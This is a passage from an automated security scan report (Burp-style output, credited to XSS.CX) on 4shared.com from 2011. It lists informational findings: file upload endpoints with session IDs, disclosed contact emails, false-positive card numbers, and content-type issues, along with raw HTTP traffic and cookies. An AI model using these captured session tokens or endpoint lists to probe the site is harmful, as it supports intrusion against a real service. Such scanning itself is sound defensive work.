Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:25 GMT
Content-Length: 38524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.4. http://www.4shared.com/icons/16x16/png.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc350.4shared.com/main/upload.jsp?sId=u11MQHnan50tXQ9o&fau=1&ausk=u11MQHnan50tXQ9o

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /icons/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:00 GMT
Content-Length: 38691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.5. http://www.4shared.com/images/asf-logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc206.4shared.com/main/upload.jsp?sId=2Dqw8yrcROidAGGZ&fau=1&ausk=2Dqw8yrcROidAGGZ

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.6. http://www.4shared.com/images/tomcat.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc393.4shared.com/main/upload.jsp?sId=Mc7M0UdwzFXbhZKE&fau=1&ausk=Mc7M0UdwzFXbhZKE

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AE600031E51DE28C97F64F946EE76F5.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.7. http://www.4shared.com/images/void.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc355.4shared.com/main/upload.jsp?sId=5pRWsH7vK8BkwLe0&fau=1&ausk=5pRWsH7vK8BkwLe0

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /images/void.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=38495591D688E5F4D8D920445CB59833.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:41 GMT
Content-Length: 38652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.8. http://www.4shared.com/js/'%20+%20img%20+%20' previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc399.4shared.com/main/upload.jsp?sId=NQgQannJVRMyWUME&fau=1&ausk=NQgQannJVRMyWUME

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:51 GMT
Content-Length: 38685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.9. http://www.4shared.com/js/'%20+%20val%20+%20' previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc177.4shared.com/main/upload.jsp?sId=cRTuSKbntWXUT7KP&fau=1&ausk=cRTuSKbntWXUT7KP

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:51 GMT
Content-Length: 38680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

13. Email addresses disclosed previous next
There are 4 instances of this issue:

/desktop/
/enterprise/
/premium.jsp
/sla.jsp

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

13.1. http://www.4shared.com/desktop/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/

Issue detail

The following email address was disclosed in the response:

support@4shared.com

Request

Response

13.2. http://www.4shared.com/enterprise/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enterprise/

Issue detail

The following email address was disclosed in the response:

enterprise@4shared.com

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23755
Date: Fri, 29 Jul 2011 13:59:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Enterprise</title
...[SNIP]...
<a href="mailto:enterprise@4shared.com" title="Please contact us to order our Enterprise Solution, as well as to find out about all possible options and quotes.">enterprise@4shared.com</a>
...[SNIP]...

13.3. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The following email address was disclosed in the response:

purchase@4shared.com

Request

Response

13.4. http://www.4shared.com/sla.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/sla.jsp

Issue detail

The following email address was disclosed in the response:

support@4shared.com

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 24527
Date: Fri, 29 Jul 2011 14:08:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Service Lev
...[SNIP]...
<%=ServerFacade.getSupportEmail()%>">support@4shared.com</a>
...[SNIP]...
<a href="mailto:support@4shared.com">support@4shared.com</a>
...[SNIP]...

14. Credit card numbers disclosed previous next
There are 2 instances of this issue:

/images/asf-logo.gif
/images/tomcat.gif

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

14.1. http://www.4shared.com/images/asf-logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The following credit card number was disclosed in the response:

4087392288060899

Request

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=29616DE849CDFC7F8AED49AA0DF2C6F3.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:42 GMT
Content-Length: 38668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<iframe id='acc612bc' name='acc612bc' src='http://openx.4shared.com/www/delivery/afr.php?zoneid=17&target=_blank&cb=0.4087392288060899&ct0=INSERT_CLICKURL_HERE' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://openx.4shared.com/www/delivery/ck.php?n=a47b84c8&cb=0.4087392288060899' target='_blank'><img src='http://openx.4shared.com/www/delivery/avw.php?zoneid=17&cb=0.4087392288060899&n=a47b84c8&ct0=INSERT_CLICKURL_HERE' border='0' alt='' />
...[SNIP]...

14.2. http://www.4shared.com/images/tomcat.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The following credit card number was disclosed in the response:

4527154996317674

Request

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=40CD7984F30667DFECE9D26045CBBCCA.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:44 GMT
Content-Length: 38661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<iframe id='acc612bc' name='acc612bc' src='http://openx.4shared.com/www/delivery/afr.php?zoneid=17&target=_blank&cb=0.4527154996317674&ct0=INSERT_CLICKURL_HERE' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://openx.4shared.com/www/delivery/ck.php?n=a47b84c8&cb=0.4527154996317674' target='_blank'><img src='http://openx.4shared.com/www/delivery/avw.php?zoneid=17&cb=0.4527154996317674&n=a47b84c8&ct0=INSERT_CLICKURL_HERE' border='0' alt='' />
...[SNIP]...

15. Content type incorrectly stated previous next
There are 2 instances of this issue:

/js/UploadModule.js
/js/homeScript.jsp

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

15.1. http://www.4shared.com/js/UploadModule.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/UploadModule.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/UploadModule.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:56:37 GMT
ETag: W/"40715-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: text/javascript
Content-Length: 40715
Date: Fri, 29 Jul 2011 13:56:36 GMT

UploadModule.FileSupported = function() {
try {
return typeof File != "undefined";
} catch(e) {
return false
}
}

UploadModule.FilePrototypeSliceSupported = function() {
try {
retu
...[SNIP]...

15.2. http://www.4shared.com/js/homeScript.jsp previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

16. Content type is not specified previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1150-1295256540000"
Last-Modified: Mon, 17 Jan 2011 09:29:00 GMT
Content-Length: 1150
Date: Fri, 29 Jul 2011 13:56:51 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...

Report generated by XSS.CX at Fri Jul 29 09:13:59 CDT 2011.